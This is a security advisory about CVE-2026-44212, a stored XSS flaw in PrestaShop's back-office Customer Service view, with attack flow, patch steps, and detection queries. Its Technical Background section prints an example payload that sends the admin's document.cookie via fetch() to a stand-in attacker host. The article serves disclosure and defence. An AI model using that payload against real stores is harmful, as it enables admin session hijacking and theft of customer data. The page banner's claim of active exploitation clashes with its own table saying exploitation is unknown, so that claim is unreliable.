Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsStudyTraining
ProjectsChecklistsAI RankingsNewsletterStatusTagsAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Study
Training
Projects
Checklists
AI Rankings
Newsletter
Status
Tags
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

1015+ Articles
124+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2026-44212: PrestaShop Stored XSS in Customer Service Back-Office
CVE-2026-44212: PrestaShop Stored XSS in Customer Service Back-Office

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

SECURITYCRITICALCVE-2026-44212

CVE-2026-44212: PrestaShop Stored XSS in Customer Service Back-Office

A stored Cross-Site Scripting vulnerability (CVSS 9.3) in PrestaShop's back-office Customer Service view allows unauthenticated attackers to inject malicious scripts via the public Contact Us form, targeting admin sessions.

Dylan H.

Security Team

May 15, 2026
5 min read

Affected Products

  • PrestaShop < 8.2.6
  • PrestaShop < 9.1.1

CVE-2026-44212: PrestaShop Stored XSS Targets Back-Office Admins

A critical stored Cross-Site Scripting (XSS) vulnerability has been disclosed in PrestaShop, the widely deployed open-source e-commerce platform, tracked as CVE-2026-44212 with a CVSS score of 9.3 (Critical). The flaw exists in the back-office Customer Service view and allows an unauthenticated external attacker to inject malicious JavaScript into the application by submitting the public Contact Us form with a specially crafted email address.

The vulnerability is patched in PrestaShop 8.2.6 and 9.1.1. Store operators running earlier versions are exposed.


Vulnerability Overview

AttributeValue
CVE IDCVE-2026-44212
CVSS Score9.3 (Critical)
CWE ClassificationCWE-79 — Improper Neutralization of Input During Web Page Generation (XSS)
Affected SoftwarePrestaShop (open source e-commerce)
Affected Versions< 8.2.6, < 9.1.1
Fixed Versions8.2.6, 9.1.1
Attack VectorNetwork — unauthenticated attacker submits Contact Us form
Authentication RequiredNone (attacker perspective)
User InteractionRequired — back-office admin must view the Customer Service thread
In-the-Wild ExploitationUnknown at time of disclosure

Technical Background

PrestaShop's Customer Service module aggregates messages from various sources, including submissions from the public-facing Contact Us form. When a customer submits a message, the associated contact data — including the sender's email address — is stored in the database and rendered in the back-office Customer Service view for administrator review.

The vulnerability arises because the email address field from Contact Us submissions is not properly sanitized or escaped before being rendered in the back-office interface. An attacker can craft a malicious email address containing an XSS payload (e.g., attacker@example.com<img src=x onerror="fetch('https://c2.attacker.example/'+document.cookie)">), which is stored in the database and executed in the browser of any administrator who views the associated Customer Service thread.

This is a stored (persistent) XSS vulnerability — the payload persists in the database and fires every time an administrator views the affected Customer Service message, without any further action from the attacker.


Attack Flow

1. Attacker submits the PrestaShop Contact Us form with a malicious email address
   containing an embedded XSS payload
 
2. PrestaShop stores the submission (including the unsanitized email) in the database
   as a Customer Service message thread
 
3. A back-office administrator views the Customer Service panel to review customer
   inquiries — standard daily workflow for store operators
 
4. The unsanitized email address is rendered in the administrator's browser,
   causing the embedded JavaScript payload to execute
 
5. Payload options include:
   - Session cookie theft (admin session hijack)
   - CSRF actions under the admin's authenticated context
   - Keylogging of back-office input fields
   - Credential exfiltration via fetch() to attacker-controlled server
   - Creation of backdoor admin accounts
 
6. Attacker receives stolen session tokens or credentials and achieves
   unauthenticated administrative access to the PrestaShop store

Why This Is Critical (CVSS 9.3)

The high CVSS score reflects several compounding factors:

  • No authentication required to inject the payload — the Contact Us form is fully public
  • Administrative target — the payload executes in an administrator's browser session with full back-office privileges
  • Persistent storage — the payload fires on every view, increasing the probability of successful exploitation
  • Broad attack surface — Customer Service is a core back-office feature used regularly by store operators
  • Full store compromise potential — a hijacked admin session provides access to all customer data, order history, payment configurations, and the ability to inject malicious code into the store's frontend

Affected Versions

The vulnerability affects PrestaShop in the following version ranges:

BranchAffectedPatched
8.x< 8.2.68.2.6+
9.x< 9.1.19.1.1+

PrestaShop operators running any 8.x version below 8.2.6, or any 9.x version below 9.1.1, should treat this as an urgent update.


Remediation

Immediate: Update PrestaShop

# Check current PrestaShop version
php bin/console prestashop:version
 
# Update via Composer (if managing via Composer)
composer update prestashop/prestashop
 
# Or download the patched release from PrestaShop GitHub
# https://github.com/PrestaShop/PrestaShop/releases

Update via the PrestaShop Back-Office > Advanced Parameters > Updates module if running a standard installation.

Target versions:

  • 8.x stores: Update to 8.2.6 or later
  • 9.x stores: Update to 9.1.1 or later

Interim Mitigations (Pre-Patch)

If immediate patching is not possible:

  1. Restrict back-office access by IP allowlist — use Nginx/Apache IP restrictions or a VPN to ensure only trusted IPs can reach the /admin path
  2. Disable the Customer Service module temporarily if not in active use (Back-Office > Modules > Customer Service > Disable)
  3. Enable a WAF with XSS filtering rules to intercept malicious Contact Us submissions at the network edge
  4. Monitor Contact Us submissions for anomalous email fields before opening them in the back-office

Detection

Review recent Contact Us submissions for suspicious email addresses:

-- Query PrestaShop database for suspicious email addresses in customer threads
SELECT id_customer_thread, email, date_add
FROM ps_customer_thread
WHERE email REGEXP '<|script|onerror|onload|javascript:'
ORDER BY date_add DESC
LIMIT 50;

Check web server access logs for unusual Contact Us form submissions:

# Look for suspicious payloads in POST requests to the contact form
grep -i "onerror\|onload\|javascript:\|<script" /var/log/nginx/access.log | \
  grep "contact" | tail -50

Impact Assessment

Impact AreaDescription
Admin Session HijackStolen session cookie enables full back-office access without credentials
Customer Data ExposureAdmin access exposes all customer PII, order history, payment data
Store DefacementAttacker-controlled admin can modify storefront content and inject malicious JS
Payment SkimmingMalicious JS injected via admin access could add checkout skimmers
PersistencePayload fires repeatedly without further attacker interaction
Supply Chain RiskCompromised store could serve malware to customers

Key Takeaways

  1. CVE-2026-44212 is a CVSS 9.3 Critical stored XSS in PrestaShop's Customer Service back-office view, triggered by unsanitized Contact Us form submissions
  2. No authentication required — any internet user can submit the malicious payload via the public contact form
  3. Update immediately to PrestaShop 8.2.6+ or 9.1.1+ to remediate the vulnerability
  4. Restrict back-office access by IP as an interim measure if patching is delayed
  5. Audit recent Customer Service threads for suspicious email addresses that may indicate prior exploitation attempts

Sources

  • CVE-2026-44212 — NIST NVD
  • PrestaShop GitHub — Releases
#PrestaShop#XSS#CVE-2026-44212#Vulnerability#E-Commerce#CWE-79#Stored XSS

Related Articles

CVE-2015-20115: RealtyScript 4.0.2 Stored XSS via File Upload in Admin Panel

CVE-2015-20115 is a stored cross-site scripting vulnerability in RealtyScript 4.0.2 that allows authenticated attackers to upload malicious script files...

5 min read

CVE-2026-42457: vCluster Platform Stored XSS via templateRef Name Field

A stored cross-site scripting vulnerability in vCluster Platform allows attackers to inject and execute arbitrary JavaScript via the name field of a templateRef, affecting all versions prior to 4.4.3, 4.5.5, 4.6.2, and 4.7.1.

4 min read

CVE-2026-5324: WordPress Brizy Page Builder Unauthenticated Stored XSS

The Brizy Page Builder plugin for WordPress contains a critical unauthenticated Stored Cross-Site Scripting flaw in versions up to 2.8.11, enabling...

3 min read
Back to all Security Alerts